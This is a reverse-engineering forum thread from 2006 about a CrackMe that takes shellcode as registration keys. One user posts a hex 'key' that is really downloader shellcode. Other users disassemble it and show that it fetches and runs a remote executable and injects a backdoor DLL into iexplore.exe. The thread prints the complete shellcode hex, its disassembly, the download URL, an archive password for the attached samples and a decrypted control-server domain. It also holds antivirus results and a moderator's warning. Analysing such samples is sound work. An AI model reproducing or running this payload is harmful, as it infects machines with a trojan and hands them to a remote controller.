000AF510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF580 00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54 ........C:\WINNT 000AF590 5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73 \system32\Yieoxs 000AF5A0 79 66 2E 64 31 6C 00 00 00 00 00 00 00 00 00 00 yf.d1l.......... 000AF5B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF5C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF5D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF5E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF5F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF680 00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54 ........C:\WINNT 000AF690 5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73 \system32\Yieoxs 000AF6A0 79 66 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 yf.dll.......... 000AF6B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF6C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF6D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF6E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF6F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF780 00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D ........C:\DOCUM 000AF790 45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53 E~1\gates\LOCALS 000AF7A0 7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66 ~1\Temp\Yieoxsyf 000AF7B0 2E 6C 6F 67 00 00 00 00 00 00 00 00 00 00 00 00 .log............ 000AF7C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF7D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF7E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF7F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000AF880 00 00 00 00 00 00 00 00 ........ 2006-12-22 11:31 0
sbright 雪币： 146 活跃值： (33) 能力值： ( LV6，RANK：90 ) 在线值：发帖 120 回帖 995 粉丝 1 关注私信	sbright 2 48 楼以后别人破的软件,....那更是不能随便用了.... 2006-12-22 12:34 0
founder 雪币： 200 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 16 回帖 281 粉丝 0 关注私信	founder 49 楼看不懂,完全进来学习. 今天的收获是感冒轻一点了. 2006-12-22 17:11 0
peaceclub 雪币： 255 活跃值： (207) 能力值： ( LV9，RANK：250 ) 在线值：发帖 59 回帖 967 粉丝 1 关注私信	peaceclub 6 50 楼本来就是调侃的语句玩的恶作剧而已,这么深的回复也能给你们挖出来说事儿 2006-12-23 17:06 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

笨笨雄

雪币： 846

活跃值： (221)

能力值： (RANK：570 )

在线值：

发帖

212

回帖

3620

粉丝

23

关注

私信

笨笨雄 14: 26 楼

25楼怎么象SHELL CODE

2006-12-12 23:31

0

CoolWolF

雪币： 230

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

6

回帖

118

粉丝

1

关注

私信

CoolWolF: 27 楼

最初由 笨笨雄 发布
25楼怎么象SHELL CODE

To find the key, think like a hacker

你把那些key粘贴为二进制就明白了

2006-12-13 01:00

0

cater

雪币： 109

活跃值： (498)

能力值：

( LV12，RANK：220 )

在线值：

发帖

58

回帖

415

粉丝

3

关注

私信

cater 5: 28 楼

感觉就是 Shell Code

2006-12-13 12:25

0

sbright

雪币： 146

活跃值： (33)

能力值：

( LV6，RANK：90 )

在线值：

发帖

120

回帖

995

粉丝

1

关注

私信

sbright 2: 29 楼

E930EFFFFFE92BEFFFFF9090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090909079214000

111010010011000011101111111111111111111111101001001010111110111111111111111111111001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000010010000100100001001000001111001001000010100000000000000
还是不明白.

2006-12-13 18:14

0

cater

雪币： 109

活跃值： (498)

能力值：

( LV12，RANK：220 )

在线值：

发帖

58

回帖

415

粉丝

3

关注

私信

cater 5: 30 楼

最初由 sbright 发布
E930EFFFFFE92BEFFFFF90909090909090909090909090909090909090909090909090.........................
还是不明白.

汗，贴到 OD 里面看看~

2006-12-13 21:09

0

sbright

雪币： 146

活跃值： (33)

能力值：

( LV6，RANK：90 )

在线值：

发帖

120

回帖

995

粉丝

1

关注

私信

sbright 2: 31 楼

找个洞,钻进去了........
终于学会了在od中如何粘贴..........选中一块区域,点右键....2进制...粘贴

.................................
但是,大侠们是如何一步步弄出来的...
能说说..........................

2006-12-13 22:33

0

nbw

雪币： 339

活跃值： (1510)

能力值：

( LV13，RANK：970 )

在线值：

发帖

141

回帖

2842

粉丝

23

关注

私信

nbw 24: 32 楼

最初由 skylly 发布
不是Telock,有简单的Tls反调试和进程逃逸
楼主，你先设置OD停在系统断点,然后在409040处下断，运行
00409040 803D 08954000 C>cmp byte ptr [<ModuleEntryPoint>], 0CC
00409047 75 0A jnz short 00409053
00409049 C705 09954000 0>mov dword ptr [409509], 5000
........

学习了！

不过TLS Data = 00409024，应该是停留在：

00409024       90             nop
00409025       90             nop
00409026       90             nop
00409027       90             nop

下面是检查真正入口点是否被调试器设置了CC。不过还是不知道TLS的CallBack address = 00409060 这个地方的作用。以前见过TLS文档，不过没看过，兄弟如果有文档的话能否给提供一份？

2006-12-14 09:47

0

skylly

雪币： 304

活跃值： (82)

能力值：

( LV9，RANK：170 )

在线值：

发帖

70

回帖

1087

粉丝

2

关注

私信

skylly 4: 33 楼

最初由 nbw 发布
学习了！

不过TLS Data = 00409024，应该是停留在：

00409024 90 nop
........

我也没有文档，看过的东西从来不保存的，能记住多少算多少.

这个EXE的TLS表中,AddressOfCallBacks处是409060,意味着TLS入口的地址保存在409060处,而409060处存的是409040,所以TLS入口为409040

我对TLS还是略知皮毛,最早见识TLS还是ooo做的那个利用TLS来做小动作的程序。
参考
http://www.pediy.com/bbshtml/bbs7/pediy7-660.htm

2006-12-14 21:46

0

nbw

雪币： 339

活跃值： (1510)

能力值：

( LV13，RANK：970 )

在线值：

发帖

141

回帖

2842

粉丝

23

关注

私信

nbw 24: 34 楼

噢，原?狨紫呀。还是没记住，下次碰到了再来问你

2006-12-14 22:47

0

binbinbin

雪币： 405

活跃值： (10)

能力值：

( LV9，RANK：1130 )

在线值：

发帖

51

回帖

690

粉丝

0

关注

私信

binbinbin 28: 35 楼

站个位置先。这个cm我没有头绪。

2006-12-16 09:23

0

KuNgBiM

雪币： 817

活跃值： (1927)

能力值：

( LV12，RANK：2670 )

在线值：

发帖

500

回帖

2517

粉丝

22

关注

私信

KuNgBiM 66: 36 楼

除heXer外,shoooo,linex,cater人引用的SHELL CODE代码:

EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B
01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C
01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068
AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375
7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862
732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811
AB1040C1E80866C74001602266B8732280700190E943EEFFFF90??????????????????
??????????????????????9090909074214000

其中以下代码可以修改标题:

??????????????????
??????????????????????

代码解密:

演示代码:
EB02EB4DE8F9FFFFFF608B6C24248B453C8B7C057801EF8B4F188B5F2001EB498B348B
01EE31C099AC84C07407C1CA0D01C2EBF43B54242875E58B5F2401EB668B0C4B8B5F1C
01EB032C8B896C241C61C331DB648B43308B400C8B701CAD8B40085E688E4E0EEC5068
AAFC0D7C50FFD68BF85A5AFFD666536A3266686C33687368656C54FFD0536A41686375
7465686C457865685368656C5450FFD753686F70656E53686B2E636E686E7061636862
732E75683A2F2F6268687474706A0353538D54240C528D5424285253FFD083C448B811
AB1040C1E80866C74001602266B8732280700190E943EEFFFF90313131313131313131
31313131313131313131319090909074214000

2006-12-17 20:37

0

peaceclub

雪币： 255

活跃值： (207)

能力值：

( LV9，RANK：250 )

在线值：

发帖

59

回帖

967

粉丝

1

关注

私信

peaceclub 6: 37 楼

555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE
这个也能注册?

2006-12-20 20:58

0

enterf

雪币： 200

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

0

回帖

3

粉丝

0

关注

私信

enterf: 38 楼

我要努力学习，到时候我也能像大家一样加入讨论

2006-12-21 19:19

0

heXer

雪币： 254

活跃值： (126)

能力值：

( LV8，RANK：130 )

在线值：

发帖

12

回帖

802

粉丝

2

关注

私信

heXer 3: 39 楼

不要试别人的KEY，有危险，完全给你可以搞个灰鸽子进去

2006-12-21 21:45

0

sbright

雪币： 146

活跃值： (33)

能力值：

( LV6，RANK：90 )

在线值：

发帖

120

回帖

995

粉丝

1

关注

私信

sbright 2: 40 楼

最初由 heXer 发布
不要试别人的KEY，有危险，完全给你可以搞个灰鸽子进去

会搞也不搞灰鸽......搞个rootkit....

2006-12-21 21:54

0

heXer

雪币： 254

活跃值： (126)

能力值：

( LV8，RANK：130 )

在线值：

发帖

12

回帖

802

粉丝

2

关注

私信

heXer 3: 41 楼

最初由 peaceclub 发布

555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE
这个也能注册?

把http://www.h86.com.cn/test/shnokey.jpg下载到system32\gs.exe然后执行
gs.exe执行以后会下载一个叫yieoxsyf.d1?的文件到system32下，并且是隐藏的，用IceSword可以看到
还会启动你的iexplore.exe并把那个yieoxsyf注入进去，iexplore.exe并不会跑出界面来，是个隐藏进程

这个东西具体会做什么我不清楚，我只是简单的在虚拟机下直接跑了一下，发现有这些变化的，然后恢复了snapshot
我把两个文件打包在复件里，文件名也改成非exe了，有兴趣的可以研究
rar压缩密码：12344321

上传的附件：

what.rar （35.65kb，1次下载）

2006-12-21 22:33

0

kanxue

雪币： 47147

活跃值： (20450)

能力值：

(RANK：350 )

在线值：

发帖

2375

回帖

17045

粉丝

541

关注

私信

kanxue 8: 42 楼

最初由 peaceclub 发布

555181EC00100000EB1B81C428100000595D33C0C35B4B33C966B9150180340BEEE2FAEB05E8EBFFFFFF0748EEEEEEB18A4FDEEEEEEE65AEE2659EF2436586E6651984EAB706A8EEEEEE0C17868180EEEE869B9C8283BA11F8650606DEEEEEEE6D02CE653284CEBD11B8EA29EAEDB2899DC029AAEDEA8B968BEEDD2EBEBEBDB9BE11B8FE6532BEBD11B8E60794111111BFB8659BD2659AC096ED1BB86598CEED1BDD27A7AF43ED2BDD35E150FED4389AE62F25E3ED34AE051FD5F19B09B065B0CAED338865E2A565B0F2ED3365EA65ED2B45B0B72D06BB11111160A0E0022F970B56761064E090360C9DD8F4C19E869A9A9ED4C1C1999999C086D6D8C08D8183C08D80C19A8B9D9AC19D868081858B97C0849E89EE
这个也能注册?

重要提醒！这是一个利用Shellcoder原理进行注册的CrackMe,放到这里只是当一个游戏，以掌握一些Shellcoder原理。peaceclub提供的这个key由于含有字符0,因此还不能溢出执行。但这段代码含有明显的恶意行为，如果将代码复制到OD里执行，程序将下载shnokey.jpg到系统目录并释放文件，然后注入iexplore.exe，并隐藏相关信息，分析详见41楼，而其本人没对这段代码带来的不良影响有任何说明!论坛一直反对各种放马行为，如果是木马、恶意代码或病毒一定需要用显眼的文字注明！希望peaceclub给个解释！

2006-12-22 09:32

0

qiweixue

雪币： 258

活跃值： (230)

能力值：

( LV12，RANK：770 )

在线值：

发帖

47

回帖

1136

粉丝

3

关注

私信

qiweixue 19: 43 楼

RPWT?

copy了一份
shellcode:
004022CA                                     EB 02 EB 4D             ?胪
004022DA  E8 F9 FF FF FF 60 8B 6C 24 24 8B 45 3C 8B 7C 05  棂???$$?<?
004022EA  78 01 EF 8B 4F 18 8B 5F 20 01 EB 49 8B 34 8B 01  x?O? 肷??
004022FA  EE 31 C0 99 AC 84 C0 74 07 C1 CA 0D 01 C2 EB F4  ???吏潦.码
0040230A  3B 54 24 28 75 E5 8B 5F 24 01 EB 66 8B 0C 4B 8B  ;T$(u?_$腈?K
0040231A  5F 1C 01 EB 03 2C 8B 89 6C 24 1C 61 C3 31 DB 64  _?,?l$a?垆
0040232A  8B 43 30 8B 40 0C 8B 70 1C AD 8B 40 08 5E 68 8E  ?0?.??@^h
0040233A  4E 0E EC 50 68 AA FC 0D 7C 50 FF D6 8B F8 5A 5A  N煨h?.|P??ZZ
0040234A  FF D6 66 53 6A 32 66 68 6C 33 68 73 68 65 6C 54  ?fSj2fhl3hshelT
0040235A  FF D0 53 6A 41 68 63 75 74 65 68 6C 45 78 65 68  ?SjAhcutehlExeh
0040236A  53 68 65 6C 54 50 FF D7 53 68 6F 70 65 6E 53 68  ShelTP?ShopenSh
0040237A  2E 63 6F 6D 68 65 64 69 79 68 62 73 2E 70 68 3A  .comhediyhbs.ph:
0040238A  2F 2F 62 68 68 74 74 70 6A 03 53 53 8D 54 24 0C  //bhhttpjSS?$.
0040239A  52 8D 54 24 28 52 53 FF D0 83 C4 48 B8 11 AB 10  R?$(RS??H??
004023AA  40 C1 E8 08 66 C7 40 01 60 22 66 B8 73 22 80 70  @凌f抢`"f阁"?
004023BA  01 90 E9 43 EE FF FF 90 53 61 79 3A D2 BB D6 B1  ?C??Say:一直
004023CA  C3 BB D3 D0 B8 DF CA D6 C4 F1 CE D2 D3 D0 B8 DF  没有高手鸟我有高
004023DA  CA D6 C4 F1 CE D2 90 90 90 90 90 90 90 90 90 90  手鸟我?????
004023EA  90 90                                           ?.

004022D6 /EB 02          jmp    short 004022DA
004022D8 |EB 4D          jmp    short 00402327
004022DA \E8 F9FFFFFF    call 004022D8
004022DF 60             pushad
004022E0 8B6C24 24    mov    ebp, dword ptr [esp+24]
004022E4 8B45 3C       mov    eax, dword ptr [ebp+3C]
004022E7 8B7C05 78    mov    edi, dword ptr [ebp+eax+78]
004022EB 01EF          add    edi, ebp
004022ED 8B4F 18       mov    ecx, dword ptr [edi+18]
004022F0 8B5F 20       mov    ebx, dword ptr [edi+20]
004022F3 01EB          add    ebx, ebp
004022F5 49             dec    ecx
004022F6 8B348B       mov    esi, dword ptr [ebx+ecx*4]
004022F9 01EE          add    esi, ebp
004022FB 31C0          xor    eax, eax
004022FD 99             cdq
004022FE AC             lods byte ptr [esi]
004022FF 84C0          test al, al
00402301 74 07          je    short 0040230A
00402303 C1CA 0D       ror    edx, 0D
00402306 01C2          add    edx, eax
00402308  ^ EB F4          jmp    short 004022FE
0040230A 3B5424 28    cmp    edx, dword ptr [esp+28]
0040230E  ^ 75 E5          jnz    short 004022F5
00402310 8B5F 24       mov    ebx, dword ptr [edi+24]
00402313 01EB          add    ebx, ebp
00402315 66:8B0C4B    mov    cx, word ptr [ebx+ecx*2]
00402319 8B5F 1C       mov    ebx, dword ptr [edi+1C]
0040231C 01EB          add    ebx, ebp
0040231E 032C8B       add    ebp, dword ptr [ebx+ecx*4]
00402321 896C24 1C    mov    dword ptr [esp+1C], ebp
00402325 61             popad
00402326 C3             retn
00402327 31DB          xor    ebx, ebx
00402329 64:8B43 30    mov    eax, dword ptr fs:[ebx+30]
0040232D 8B40 0C       mov    eax, dword ptr [eax+C]
00402330 8B70 1C       mov    esi, dword ptr [eax+1C]
00402333 AD             lods dword ptr [esi]
00402334 8B40 08       mov    eax, dword ptr [eax+8]
00402337 5E             pop    esi
00402338 68 8E4E0EEC    push EC0E4E8E
0040233D 50             push eax
0040233E 68 AAFC0D7C    push 7C0DFCAA
00402343 50             push eax
00402344 FFD6          call esi
00402346 8BF8          mov    edi, eax
00402348 5A             pop    edx
00402349 5A             pop    edx
0040234A FFD6          call esi
0040234C 66:53          push bx
0040234E 6A 32          push 32
00402350 66:68 6C33    push 336C
00402354 68 7368656C    push 6C656873
00402359 54             push esp
0040235A FFD0          call eax
0040235C 53             push ebx
0040235D 6A 41          push 41
0040235F 68 63757465    push 65747563
00402364 68 6C457865    push 6578456C
00402369 68 5368656C    push 6C656853
0040236E 54             push esp
0040236F 50             push eax
00402370 FFD7          call edi
00402372 53             push ebx
00402373 68 6F70656E    push 6E65706F
00402378 53             push ebx
00402379 68 2E636F6D    push 6D6F632E
0040237E 68 65646979    push 79696465
00402383 68 62732E70    push 702E7362
00402388 68 3A2F2F62    push 622F2F3A
0040238D 68 68747470    push 70747468
00402392 6A 03          push 3
00402394 53             push ebx
00402395 53             push ebx
00402396 8D5424 0C    lea    edx, dword ptr [esp+C]
0040239A 52             push edx
0040239B 8D5424 28    lea    edx, dword ptr [esp+28]
0040239F 52             push edx
004023A0 53             push ebx
004023A1 FFD0          call eax
004023A3 83C4 48       add    esp, 48
004023A6 B8 11AB1040    mov    eax, 4010AB11
004023AB C1E8 08       shr    eax, 8
004023AE 66:C740 01 6022 mov    word ptr [eax+1], 2260
004023B4 66:B8 7322    mov    ax, 2273
004023B8 8070 01 90    xor    byte ptr [eax+1], 90
004023BC  - E9 43EEFFFF    jmp    00401204
004023C1 90             nop
004023C2 53             push ebx
004023C3 61             popad
004023C4 79 3A          jns    short 00402400
004023C6 D2BB D6B1C3BB sar    byte ptr [ebx+BBC3B1D6], cl
004023CC D3D0          rcl    eax, cl
004023CE B8 DFCAD6C4    mov    eax, C4D6CADF
004023D3 F1             int1
004023D4 CE             into
004023D5 D2D3          rcl    bl, cl
004023D7 D0B8 DFCAD6C4 sar    byte ptr [eax+C4D6CADF], 1
004023DD F1             int1
004023DE CE             into
004023DF D290 90909090 rcl    byte ptr [eax+90909090], cl
004023E5 90             nop
004023E6 90             nop
004023E7 90             nop
004023E8 90             nop
004023E9 90             nop
004023EA 90             nop
004023EB 90             nop

2006-12-22 10:06

0

DarkNess0ut

雪币： 367

活跃值： (42)

能力值：

( LV2，RANK：10 )

在线值：

发帖

7

回帖

212

粉丝

2

关注

私信

DarkNess0ut: 44 楼

.text:100036AE ; END OF FUNCTION CHUNK FOR DllEntryPoint
.text:100036AE ; ---------------------------------------------------------------------------
.text:100036B3 s->Goldsun    db 'Goldsun',0
.text:100036BB                align 4
.text:100036BC                dd 0
.text:100036C0                db 0
.text:100036C1
.text:100036C1 ; =============== S U B R O U T I N E =======================================
.text:100036C1
.text:100036C1
.text:100036C1 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpReserved)
.text:100036C1                public DllEntryPoint
.text:100036C1 DllEntryPoint proc near

这下.............

2006-12-22 10:46

0

skylly

雪币： 304

活跃值： (82)

能力值：

( LV9，RANK：170 )

在线值：

发帖

70

回帖

1087

粉丝

2

关注

私信

skylly 4: 45 楼

原以为peaceclub是个好人,想也没想就运行了他的key,

2006-12-22 11:05

0

飞段

雪币： 200

活跃值： (10)

能力值：

( LV2，RANK：10 )

在线值：

发帖

2

回帖

18

粉丝

0

关注

私信

飞段: 46 楼

1:
AntiVir 7.3.0.21 12.21.2006 DR/PcClient.Gen
Authentium 4.93.8 12.22.2006  no virus found
Avast 4.7.892.0 12.21.2006 Win32:Pcclient-CY
AVG 386 12.21.2006  no virus found
BitDefender 7.2 12.22.2006 Dropped:Backdoor.Pcclient.SYS
CAT-QuickHeal 8.00 12.21.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.21.2006  no virus found
DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856
eSafe 7.0.14.0 12.21.2006  no virus found
eTrust-InoculateIT 23.73.95 12.22.2006  no virus found
eTrust-Vet 30.3.3268 12.21.2006  no virus found
Ewido 4.0 12.21.2006  no virus found
Fortinet 2.82.0.0 12.21.2006  no virus found
F-Prot 3.16f 12.21.2006  no virus found
F-Prot4 4.2.1.29 12.21.2006  no virus found
Ikarus T3.1.0.27 12.21.2006  no virus found
Kaspersky 4.0.2.24 12.22.2006  no virus found
McAfee 4924 12.21.2006 BackDoor-CKB
Microsoft 1.1904 12.21.2006  no virus found
NOD32v2 1934 12.21.2006 a variant of Win32/PcClient
Norman 5.80.02 12.21.2006  no virus found
Panda 9.0.0.4 12.21.2006 Suspicious file
Prevx1 V2 12.22.2006  no virus found
Sophos 4.12.0 12.21.2006  no virus found
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.135 12.20.2006  no virus found
UNA 1.83 12.21.2006  no virus found
VBA32 3.11.1 12.21.2006 suspected of Backdoor.Hupigon.17
VirusBuster 4.3.19:9 12.21.2006 no virus found
2:
AntiVir 7.3.0.21 12.21.2006 TR/Dldr.Small.bgk
Authentium 4.93.8 12.22.2006  no virus found
Avast 4.7.892.0 12.21.2006 Win32:PcClient-EO
AVG 386 12.21.2006  no virus found
BitDefender 7.2 12.22.2006 Trojan.Downloader.Gen
CAT-QuickHeal 8.00 12.21.2006  no virus found
ClamAV devel-20060426 12.21.2006  no virus found
DrWeb 4.33 12.21.2006 Trojan.DownLoader.3856
eSafe 7.0.14.0 12.21.2006  no virus found
eTrust-InoculateIT 23.73.95 12.22.2006  no virus found
eTrust-Vet 30.3.3268 12.21.2006 Win32/Pcclient!generic
Ewido 4.0 12.21.2006 Backdoor.PcClient.cj
Fortinet 2.82.0.0 12.21.2006  no virus found
F-Prot 3.16f 12.21.2006  no virus found
F-Prot4 4.2.1.29 12.21.2006  no virus found
Ikarus T3.1.0.27 12.21.2006 Trojan-Downloader.Win32.Small.BID
Kaspersky 4.0.2.24 12.22.2006  no virus found
McAfee 4924 12.21.2006  no virus found
Microsoft 1.1904 12.21.2006  no virus found
NOD32v2 1934 12.21.2006 a variant of Win32/PcClient.IF
Norman 5.80.02 12.21.2006  no virus found
Panda 9.0.0.4 12.21.2006 Suspicious file
Prevx1 V2 12.22.2006  no virus found
Sophos 4.12.0 12.21.2006  no virus found
Sunbelt 2.2.907.0 12.18.2006  no virus found
TheHacker 6.0.3.135 12.20.2006  no virus found
UNA 1.83 12.21.2006  no virus found
VBA32 3.11.1 12.21.2006 suspected of Backdoor.PcClient.1
VirusBuster 4.3.19:9 12.21.2006 no virus found

木马兼下载器,好象还有驱动,RP有待提高!

2006-12-22 11:25

0

heXer

雪币： 254

活跃值： (126)

能力值：

( LV8，RANK：130 )

在线值：

发帖

12

回帖

802

粉丝

2

关注

私信

heXer 3: 47 楼

密钥:10 20 17 10 09 55 11 EB
解密yieoxsyf.d1l末尾0x8B8字节，应该是配置吧

000AEFD0  90 1F 00 00 00 26 00 00 AC 2D 00 00 83 1F 00 00  ?...&..?..?..
000AEFE0  00 00 00 00 0A 00 00 00 31 00 00 00 01 00 00 00  ........1......
000AEFF0  33 88 00 00 77 65 62 75 70 64 61 74 65 2E 33 33  3?.webupdate.33
000AF000  32 32 2E 6F 72 67 00 00 00 00 00 00 00 00 00 00  22.org..........
000AF010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF0E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
